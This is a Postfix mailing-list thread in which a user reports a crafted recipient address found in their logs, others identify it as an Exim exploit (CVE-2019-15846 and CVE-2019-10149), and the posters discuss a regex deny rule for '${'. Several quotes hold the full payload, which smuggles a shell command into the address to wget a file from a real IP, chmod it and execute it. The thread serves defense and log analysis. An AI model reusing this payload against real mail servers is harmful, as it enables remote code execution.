Re: [External] command injection by crafted recipient address

2020-03-13 Thread Wietse Venema
Joe Acquisto-j4: > >>> > > kris_h: > >> Hey Wietse, > >> > >> thank you for this clearification. > >> > >> What do you think about using the reject-recipient /\$\{/-rule? > > > > As a temporary rule, it may have made sense when the Exim bug was new. > > > > As a permanent 'deny' rule, it won't

Re: [External] command injection by crafted recipient address

2020-03-13 Thread Joe Acquisto-j4
>>> > kris_h: >> Hey Wietse, >> >> thank you for this clearification. >> >> What do you think about using the reject-recipient /\$\{/-rule? > > As a temporary rule, it may have made sense when the Exim bug was new. > > As a permanent 'deny' rule, it won't block new exploits. > > Wietse

Re: [External] command injection by crafted recipient address

2020-03-13 Thread kris_h
> As a temporary rule, it may have made sense when the Exim bug was new. > As a permanent 'deny' rule, it won't block new exploits. yes, you're right, each PCRE-rule more is one more to be passed for each recipient... Thanks Kris -- Sent from: http://postfix.1071664.n5.nabble.com/Postfi

Re: [External] command injection by crafted recipient address

2020-03-13 Thread Wietse Venema
kris_h: > Hey Wietse, > > thank you for this clearification. > > What do you think about using the reject-recipient /\$\{/-rule? As a temporary rule, it may have made sense when the Exim bug was new. As a permanent 'deny' rule, it won't block new exploits. Wietse

Re: [External] command injection by crafted recipient address

2020-03-13 Thread kris_h
Hey Wietse, thank you for this clearification. What do you think about using the reject-recipient /\$\{/-rule? Kris -- Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html

Re: [External] command injection by crafted recipient address

2020-03-12 Thread Wietse Venema
Kevin A. McGrail: > > On 3/12/2020 4:40 PM, kris_h wrote: > > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost > > It's an exim exploit. See CVE-2019-15846. The above is very similar to the Exim exploit for CVE-2019-10149 in https://www

Re: [External] command injection by crafted recipient address

2020-03-12 Thread kris_h
> It's an exim exploit. See CVE-2019-15846. @KAM Thanks a lot for this really quick reply! -- Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html

Re: [External] command injection by crafted recipient address

2020-03-12 Thread Kevin A. McGrail
On 3/12/2020 4:40 PM, kris_h wrote: > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost It's an exim exploit.  See CVE-2019-15846. Regards, KAM

command injection by crafted recipient address

2020-03-12 Thread kris_h
Hey i found this crazy recipient-address in my postfix-logs: root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost seems that someone tries to to downlaod something with wget, then chmod 'x' and finally execute the downloded crap Is there a